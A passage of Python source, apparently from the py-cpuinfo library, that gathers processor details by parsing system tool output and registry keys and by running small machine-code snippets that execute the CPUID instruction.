self._output.write('\t\t{0}: {1}\n'.format(key, new_info[key]))
else:
self._output.write('\t\tNone\n')
self._output.write('\n')
self._output.flush()
def write(self, msg):
if not self._is_active: return
self._output.write(msg + '\n')
self._output.flush()
def to_dict(self, info, is_fail):
return {
'output' : self._output.getvalue(),
'stdout' : self._stdout.getvalue(),
'stderr' : self._stderr.getvalue(),
'info' : info,
'err' : self._err,
'is_fail' : is_fail
}
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
is_beos = 'beos' in uname or 'haiku' in uname
return is_beos and len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
processor_brand = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "ProcessorNameString")
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
vendor_id_raw = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "VendorIdentifier")
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
arch_string_raw = _read_windows_registry_key(r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE")
return arch_string_raw
@staticmethod
def winreg_hz_actual():
hz_actual = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "~Mhz")
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
feature_bits = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "FeatureSet")
return feature_bits
def _program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
p1, p2, stdout_output, stderr_output = None, None, None, None
g_trace.command_header('Running command "' + ' '.join(command) + '" ...')
# Run the command normally
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
# Run the command and pipe it into another command
else:
p2 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p1 = Popen(pipe_command, stdin=p2.stdout, stdout=PIPE, stderr=PIPE)
p2.stdout.close()
# Get the stdout and stderr
stdout_output, stderr_output = p1.communicate()
if not IS_PY2:
stdout_output = stdout_output.decode(encoding='UTF-8')
stderr_output = stderr_output.decode(encoding='UTF-8')
# Send the result to the logger
g_trace.command_output('return code:', str(p1.returncode))
g_trace.command_output('stdout:', stdout_output)
# Return the return code and stdout
return p1.returncode, stdout_output
def _read_windows_registry_key(key_name, field_name):
g_trace.command_header('Reading Registry key "{0}" field "{1}" ...'.format(key_name, field_name))
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_name)
value = winreg.QueryValueEx(key, field_name)[0]
winreg.CloseKey(key)
g_trace.command_output('value:', str(value))
return value
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some ARM/PPC/S390X CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
g_trace.keys(keys, info, new_info)
# Update the keys with new values
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _friendly_bytes_to_int(friendly_bytes):
input = friendly_bytes.lower()
formats = {
'gb' : 1024 * 1024 * 1024,
'mb' : 1024 * 1024,
'kb' : 1024,
'g' : 1024 * 1024 * 1024,
'm' : 1024 * 1024,
'k' : 1024,
'b' : 1,
}
try:
for pattern, multiplier in formats.items():
if input.endswith(pattern):
return int(input.split(pattern)[0].strip()) * multiplier
except Exception as err:
pass
return friendly_bytes
def _parse_cpu_brand_string(cpu_string):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer(r"\(", cpu_string)]
ends = [m.start() for m in re.finditer(r"\)", cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except Exception as err:
g_trace.fail(err)
#raise
pass
return {}
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match(r'^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match(r'^armv8-a|aarch64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match(r'^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match(r'^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match(r'^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match(r'^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match(r'^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
elif re.match(r'^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match(r'^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
return (arch, bits)
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
def _is_selinux_enforcing(trace):
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
trace.fail('Failed to find sestatus.')
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
trace.fail('Failed to run sestatus. Skipping ...')
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
trace.command_output('can_selinux_exec_heap:', can_selinux_exec_heap)
trace.command_output('can_selinux_exec_memory:', can_selinux_exec_memory)
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _filter_dict_keys_with_empty_values(info):
# Filter out None, 0, "", (), {}, []
info = {k: v for k, v in info.items() if v}
# Filter out (0, 0)
info = {k: v for k, v in info.items() if v != (0, 0)}
# Filter out strings that start with "0.0"
info = {k: v for k, v in info.items() if not (type(v) == str and v.startswith('0.0'))}
return info
class ASM(object):
def __init__(self, restype=None, argtypes=(), machine_code=[]):
self.restype = restype
self.argtypes = argtypes
self.machine_code = machine_code
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
def compile(self):
machine_code = bytes.join(b'', self.machine_code)
self.size = ctypes.c_size_t(len(machine_code))
if DataSource.is_windows:
# Allocate a memory segment the size of the machine code, and make it executable
size = len(machine_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
self.address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not self.address:
raise Exception("Failed to VirtualAlloc")
# Copy the machine code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(self.address, machine_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(self.address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(self.address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
from mmap import mmap, MAP_PRIVATE, MAP_ANONYMOUS, PROT_WRITE, PROT_READ, PROT_EXEC
# Allocate a private and executable memory segment the size of the machine code
machine_code = bytes.join(b'', self.machine_code)
self.size = len(machine_code)
self.mm = mmap(-1, self.size, flags=MAP_PRIVATE | MAP_ANONYMOUS, prot=PROT_WRITE | PROT_READ | PROT_EXEC)
# Copy the machine code into the memory segment
self.mm.write(machine_code)
self.address = ctypes.addressof(ctypes.c_int.from_buffer(self.mm))
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(self.restype, *self.argtypes)
self.func = functype(self.address)
def run(self):
# Call the machine code like a function
retval = self.func()
return retval
def free(self):
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(self.address), ctypes.c_size_t(0), MEM_RELEASE)
else:
self.mm.close()
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
class CPUID(object):
def __init__(self, trace=None):
if trace == None:
trace = Trace(False, False)
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing(trace)
def _asm_func(self, restype=None, argtypes=(), machine_code=[]):
asm = ASM(restype, argtypes, machine_code)
asm.compile()
return asm
def _run_asm(self, *machine_code):
asm = ASM(ctypes.c_uint32, (), machine_code)
asm.compile()
retval = asm.run()
asm.free()
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping_id = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family_id = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model_id = (eax >> 16) & 0xF # 4 bits
extended_family_id = (eax >> 20) & 0xFF # 8 bits
family = 0
if family_id in [15]:
family = extended_family_id + family_id
else:
family = family_id
if family_id in [6, 15]:
model = (extended_model_id << 4) + model
return {
'stepping' : stepping_id,
'model' : model,
'family' : family,
'processor_type' : processor_type
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
